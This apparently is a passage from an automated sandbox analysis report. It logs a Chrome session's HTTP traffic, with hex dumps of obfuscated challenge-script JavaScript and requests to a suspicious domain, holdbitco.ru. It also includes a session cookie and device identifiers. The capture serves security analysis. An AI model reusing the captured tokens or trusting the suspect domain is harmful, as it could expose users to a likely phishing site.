                                                                                                                                                                                                                                                                                                              Data Ascii: 43.83][3]^65+this.h[g[ja(412)](143,this.g)][1][ja(1387)](this.h[143^this.g][0]++)&255.09,i&&(h[0]=j,h[3]=150^k)}function fH(c,iq,d,e,f,g,h,i,j){if(iq=i7,d={'SYwBP':iq(476),'nLiwo':function(l,m){return l(m)},'qjpTC':function(l,m){return l(m)},'BPsQp':funct
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1229INData Raw: 37 66 66 38 0d 0a 5d 5b 69 7a 28 31 31 36 35 29 5d 3d 6a 5b 69 7a 28 32 36 34 29 5d 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 31 34 37 33 29 5d 3d 6a 5b 69 7a 28 31 35 35 31 29 5d 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 33 33 37 29 5d 3d 6a 5b 69 7a 28 35 35 38 29 5d 7c 7c 69 7a 28 31 33 36 37 29 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 31 33 30 30 29 5d 3d 6a 5b 69 7a 28 34 39 34 29 5d 7c 7c 38 65 33 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 31 32 37 36 29 5d 3d 6a 5b 69 7a 28 31 30 38 33 29 5d 7c 7c 32 39 65 34 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 37 39 33 29 5d 3d 6a 5b 63 5b 69 7a 28 31 35 39 33 29 5d 5d 7c 7c 63 5b 69 7a 28 38 39 36 29 5d 2c 66 79 5b 69 7a 28 31 34 30 32 29 5d 5b 69 7a 28 35 35 34
                                                                                                                                                                                                                                                                                                              Data Ascii: 7ff8][iz(1165)]=j[iz(264)],fy[iz(1402)][iz(1473)]=j[iz(1551)],fy[iz(1402)][iz(337)]=j[iz(558)]||iz(1367),fy[iz(1402)][iz(1300)]=j[iz(494)]||8e3,fy[iz(1402)][iz(1276)]=j[iz(1083)]||29e4,fy[iz(1402)][iz(793)]=j[c[iz(1593)]]||c[iz(896)],fy[iz(1402)][iz(554
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1233INData Raw: 28 31 34 30 32 29 5d 5b 69 65 28 31 31 35 38 29 5d 2c 6b 5b 69 65 28 39 39 34 29 5d 3d 66 79 5b 69 65 28 31 34 30 32 29 5d 5b 69 65 28 31 35 32 37 29 5d 7c 7c 27 27 2c 6b 5b 69 65 28 32 37 30 29 5d 3d 66 79 5b 69 65 28 31 34 30 32 29 5d 5b 69 65 28 37 37 36 29 5d 7c 7c 27 27 2c 6c 3d 4a 53 4f 4e 5b 69 65 28 31 31 33 34 29 5d 28 6b 29 2c 69 5b 69 65 28 31 36 35 35 29 5d 28 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 67 63 28 6a 6d 2c 64 2c 65 29 7b 6a 6d 3d 69 37 2c 64 3d 7b 7d 2c 64 5b 6a 6d 28 31 34 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 5e 67 7d 2c 64 5b 6a 6d 28 31 35 31 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 26 67 7d 2c 64 5b 6a 6d 28 37 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                              Data Ascii: (1402)][ie(1158)],k[ie(994)]=fy[ie(1402)][ie(1527)]||'',k[ie(270)]=fy[ie(1402)][ie(776)]||'',l=JSON[ie(1134)](k),i[ie(1655)](l)}function gc(jm,d,e){jm=i7,d={},d[jm(1427)]=function(f,g){return f^g},d[jm(1515)]=function(f,g){return f&g},d[jm(782)]=function(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1237INData Raw: 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 63 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 31 28 68 2c 6a 62 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 6a 62 3d 69 37 2c 69 3d 7b 7d 2c 69 5b 6a 62 28 31 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 75 5e 73 7d 2c 69 5b 6a 62 28 31 38 39 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 26 75 7d 2c 69 5b 6a 62 28 33 33 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 2b 75 7d 2c 69 5b 6a 62 28 31 33 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 75 3d 3d 3d 73 7d 2c 69 5b 6a 62 28 31 30 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                                                                              Data Ascii: n':function(e){return e(c)}}}function g1(h,jb,i,j,k,l,m,n,o){jb=i7,i={},i[jb(137)]=function(s,u){return u^s},i[jb(1892)]=function(s,u){return s&u},i[jb(338)]=function(s,u){return s+u},i[jb(1377)]=function(s,u){return u===s},i[jb(1052)]=function(s,u){retur
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1241INData Raw: 2e 67 5d 5b 31 5d 5b 6b 66 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 33 36 29 2c 6c 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 2e 34 36 5d 5b 33 5d 5e 66 5b 6b 66 28 32 33 39 29 5d 28 66 5b 6b 66 28 31 37 33 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 2e 30 36 5d 5b 31 5d 5b 6b 66 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 66 5b 6b 66 28 38 33 33 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 31 39 31 29 2c 32 35 36 29 26 32 35 35 2e 33 36 2c 6a 26 26 28 69 5b 30 5d 3d 6b 2c 69 5b 33 5d 3d 66 5b 6b 66 28 36 30 31 29 5d 28 6c 2c 31 35 30 29 29 7d 72 65 74 75 72 6e 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 49 28 69 73 2c 65 2c 66 2c 68 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: .g][1][kf(1387)](this.h[this.g^143][0]++)&255.36),l=this.h[this.g^143.46][3]^f[kf(239)](f[kf(1736)](this.h[this.g^143.06][1][kf(1387)](this.h[f[kf(833)](143,this.g)][0]++),191),256)&255.36,j&&(i[0]=k,i[3]=f[kf(601)](l,150))}return![]}function fI(is,e,f,h,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1245INData Raw: 6b 4c 28 31 35 33 30 29 5d 29 2c 68 5b 6b 4c 28 34 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6b 4d 29 7b 6b 4d 3d 6b 4c 2c 74 68 69 73 5b 6b 4d 28 34 33 35 29 5d 3d 6e 75 6c 6c 2c 74 68 69 73 5b 6b 4d 28 31 32 32 32 29 5d 5b 6b 4d 28 31 32 30 39 29 5d 28 74 68 69 73 29 7d 2c 67 5b 6b 4c 28 33 32 33 29 5d 28 68 29 2c 69 3d 4a 5b 6b 4c 28 31 33 34 39 29 5d 28 4b 5b 6b 4c 28 31 34 30 32 29 5d 5b 6b 4c 28 35 32 38 29 5d 29 2c 67 5b 6b 4c 28 33 32 33 29 5d 28 69 29 2c 63 5b 6b 4c 28 31 34 32 39 29 5d 28 4c 2c 66 2c 67 29 2c 6a 3d 4d 5b 6b 4c 28 35 30 30 29 5d 28 27 68 32 27 29 2c 6a 2e 69 64 3d 63 5b 6b 4c 28 31 33 32 36 29 5d 2c 6a 5b 6b 4c 28 38 36 36 29 5d 5b 6b 4c 28 32 33 30 29 5d 28 27 68 32 27 29 2c 6a 5b 6b 4c 28 31 38 32 36 29 5d 3d 63 5b 6b 4c 28 33
                                                                                                                                                                                                                                                                                                              Data Ascii: kL(1530)]),h[kL(435)]=function(kM){kM=kL,this[kM(435)]=null,this[kM(1222)][kM(1209)](this)},g[kL(323)](h),i=J[kL(1349)](K[kL(1402)][kL(528)]),g[kL(323)](i),c[kL(1429)](L,f,g),j=M[kL(500)]('h2'),j.id=c[kL(1326)],j[kL(866)][kL(230)]('h2'),j[kL(1826)]=c[kL(3
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1249INData Raw: 6f 6e 28 6a 2c 6f 2c 6a 78 2c 73 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 29 7b 66 6f 72 28 6a 78 3d 6a 73 2c 73 3d 7b 7d 2c 73 5b 6a 78 28 31 30 36 30 29 5d 3d 6a 78 28 31 36 34 39 29 2c 73 5b 6a 78 28 31 35 36 30 29 5d 3d 65 5b 6a 78 28 31 30 34 38 29 5d 2c 42 3d 73 2c 43 3d 5b 31 31 31 36 33 35 32 34 30 38 2c 31 38 39 39 34 34 37 34 34 31 2c 33 30 34 39 33 32 33 34 37 31 2c 33 39 32 31 30 30 39 35 37 33 2c 39 36 31 39 38 37 31 36 33 2c 31 35 30 38 39 37 30 39 39 33 2c 32 34 35 33 36 33 35 37 34 38 2c 32 38 37 30 37 36 33 32 32 31 2c 33 36 32 34 33 38 31 30 38 30 2c 33 31 30 35 39 38 34 30 31 2c 36 30 37 32 32 35 32 37 38 2c 31 34 32 36 38 38 31 39 38 37 2c 31 39 32 35 30 37 38 33 38 38 2c 32 31 36
                                                                                                                                                                                                                                                                                                              Data Ascii: on(j,o,jx,s,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q){for(jx=js,s={},s[jx(1060)]=jx(1649),s[jx(1560)]=e[jx(1048)],B=s,C=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,216
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1253INData Raw: 3b 63 61 73 65 27 32 27 3a 6b 5b 6b 61 28 38 36 36 29 5d 5b 6b 61 28 32 33 30 29 5d 28 6b 61 28 31 31 31 33 29 2c 64 5b 6b 61 28 37 33 39 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6a 3d 66 7a 5b 6b 61 28 35 30 30 29 5d 28 64 5b 6b 61 28 31 30 32 36 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6b 3d 66 7a 5b 6b 61 28 35 30 30 29 5d 28 6b 61 28 36 31 37 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 69 5b 6b 61 28 38 36 36 29 5d 5b 6b 61 28 32 33 30 29 5d 28 64 5b 6b 61 28 31 30 39 36 29 5d 2c 6b 61 28 31 34 38 36 29 2c 6b 61 28 31 35 33 39 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 6d 5b 6b 61 28 36 39 36 29 5d 3d 65 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6c 3d 66 7a 5b 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: ;case'2':k[ka(866)][ka(230)](ka(1113),d[ka(739)]);continue;case'3':j=fz[ka(500)](d[ka(1026)]);continue;case'4':k=fz[ka(500)](ka(617));continue;case'5':i[ka(866)][ka(230)](d[ka(1096)],ka(1486),ka(1539));continue;case'6':m[ka(696)]=e;continue;case'7':l=fz[k
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1257INData Raw: 36 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 69 5b 6a 6f 28 31 37 36 35 29 5d 28 69 5b 6a 6f 28 36 38 34 29 5d 28 74 68 69 73 2e 68 5b 31 34 33 2e 31 33 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 6a 6f 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 5d 5b 30 5d 2b 2b 29 2c 31 39 31 29 2b 32 35 36 2c 32 35 35 29 5e 31 34 32 2c 6c 3d 69 5b 6a 6f 28 31 33 34 36 29 5d 28 69 5b 6a 6f 28 35 36 32 29 5d 28 74 68 69 73 2e 68 5b 69 5b 6a 6f 28 31 33 34 36 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 36 35 2b 74 68 69 73 2e 68 5b 69 5b 6a 6f 28 35 36 32 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 6a 6f 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 31 34 33 2e 31 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 38 38 29
                                                                                                                                                                                                                                                                                                              Data Ascii: 6^this.g][3]^i[jo(1765)](i[jo(684)](this.h[143.13^this.g][1][jo(1387)](this.h[this.g^143][0]++),191)+256,255)^142,l=i[jo(1346)](i[jo(562)](this.h[i[jo(1346)](143,this.g)][3],65+this.h[i[jo(562)](143,this.g)][1][jo(1387)](this.h[143.1^this.g][0]++)&255.88)
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1261INData Raw: 32 62 36 62 0d 0a 34 36 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 6a 6f 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 69 5b 6a 6f 28 32 32 36 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 31 37 29 2c 6d 3d 5b 5d 2c 75 3d 30 3b 75 3c 6c 3b 6d 5b 6a 6f 28 31 34 35 35 29 5d 28 74 68 69 73 2e 68 5b 31 34 33 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 36 35 2b 74 68 69 73 2e 68 5b 69 5b 6a 6f 28 32 31 39 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 6a 6f 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 34 33 2e 39 39 5d 5b 30 5d 2b 2b 29 26 32 35 35 5e 37 38 2e 31 31 29 2c 75 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 69 5b 6a 6f 28 31 36 37 38 29 5d 28 31 36 38 2c 6c 29 29 7b 66 6f 72 28 6d 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 2b6b46)](143,this.g)][1][jo(1387)](this.h[i[jo(226)](143,this.g)][0]++)&255.17),m=[],u=0;u<l;m[jo(1455)](this.h[143^this.g][3]^65+this.h[i[jo(219)](143,this.g)][1][jo(1387)](this.h[this.g^143.99][0]++)&255^78.11),u++);}else if(i[jo(1678)](168,l)){for(m=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1265INData Raw: 35 39 29 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 68 56 28 63 2c 64 2c 6b 55 2c 65 29 7b 6b 55 3d 69 37 2c 65 3d 7b 27 4f 51 67 6f 70 27 3a 6b 55 28 31 33 36 39 29 2c 27 79 50 68 6f 77 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 28 67 2c 68 29 7d 7d 2c 64 3d 64 7c 7c 6b 55 28 36 34 32 29 2c 65 5b 6b 55 28 38 31 33 29 5d 28 68 51 2c 63 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 6b 56 29 7b 6b 56 3d 6b 55 2c 66 5b 6b 56 28 31 37 32 34 29 5d 5b 6b 56 28 31 36 33 37 29 5d 3d 64 2c 66 5b 6b 56 28 31 37 32 34 29 5d 5b 6b 56 28 31 38 33 37 29 5d 3d 65 5b 6b 56 28 31 30 33 34 29 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 66 4e 28 64 2c 65 2c 69 4e 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 4e 3d 69 37 2c 66 3d 7b 7d 2c 66 5b 69 4e 28 31 36 39
                                                                                                                                                                                                                                                                                                              Data Ascii: 59)]})}function hV(c,d,kU,e){kU=i7,e={'OQgop':kU(1369),'yPhow':function(f,g,h){return f(g,h)}},d=d||kU(642),e[kU(813)](hQ,c,function(f,kV){kV=kU,f[kV(1724)][kV(1637)]=d,f[kV(1724)][kV(1837)]=e[kV(1034)]})}function fN(d,e,iN,f,g){return iN=i7,f={},f[iN(169
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1269INData Raw: 75 29 7b 72 65 74 75 72 6e 20 75 5e 73 7d 2c 68 5b 6a 66 28 35 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 2d 75 7d 2c 68 5b 6a 66 28 34 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 5e 75 7d 2c 68 5b 6a 66 28 38 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 73 5e 75 7d 2c 68 5b 6a 66 28 32 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 75 29 7b 72 65 74 75 72 6e 20 75 5e 73 7d 2c 69 3d 68 2c 6a 3d 74 68 69 73 2e 68 5b 69 5b 6a 66 28 31 38 31 39 29 5d 28 31 34 33 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 36 35 2b 74 68 69 73 2e 68 5b 31 34 33 2e 35 35 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 6a 66 28 31 33 38 37 29 5d 28 74 68 69 73 2e 68 5b 31 34 33 5e 74 68
                                                                                                                                                                                                                                                                                                              Data Ascii: u){return u^s},h[jf(545)]=function(s,u){return s-u},h[jf(401)]=function(s,u){return s^u},h[jf(817)]=function(s,u){return s^u},h[jf(282)]=function(s,u){return u^s},i=h,j=this.h[i[jf(1819)](143,this.g)][3]^65+this.h[143.55^this.g][1][jf(1387)](this.h[143^th
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1271INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              8435.190.80.1443192.168.2.1649808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1159INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                                                                                              access-control-max-age: 86400
                                                                                                                                                                                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              85104.17.3.184443192.168.2.1649809C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1159INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4117d0e1fd3-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1159INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1159INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              86192.168.2.164981035.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1271OUTPOST /report/v3?s=J8I70%2FF5if0I3ZOJT1VpkJ0%2F3RsDViHHj4MmpLieQnShCDKxFFtOYJ2OYysBnxanROVdwMtmFcorJfEl3hn0salg57S0ibXuEy27HdNizI4h0aVL%2BJy7zD6NvbQ%2FrxRTc%2FcyumgVp%2Bh%2BnSvu HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 446
                                                                                                                                                                                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1272OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 30 2e 39 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 78 6d 61 69 79 70 6d 66 75 79 74 2e 68 6f 6c 64 62
                                                                                                                                                                                                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":895,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.0.95","status_code":400,"type":"http.error"},"type":"network-error","url":"https://yxmaiypmfuyt.holdb


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              87192.168.2.1649811104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1272OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              8835.190.80.1443192.168.2.1649810C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1273INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              89192.168.2.1649812104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:42 UTC1273OUTGET /web5/assets/cloudfavicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              9192.168.2.164973923.1.237.25443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC209OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                                                                                                                                                              Origin: https://www.bing.com
                                                                                                                                                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                                                                                                              Content-type: text/xml
                                                                                                                                                                                                                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                                                                                                                                                                                                                              X-BM-CBT: 1696585056
                                                                                                                                                                                                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                                                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                                                                                                                                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                                                                                                                                                              X-BM-DeviceScale: 100
                                                                                                                                                                                                                                                                                                              X-BM-DTZ: 120
                                                                                                                                                                                                                                                                                                              X-BM-Market: CH
                                                                                                                                                                                                                                                                                                              X-BM-Theme: 000000;0078d7
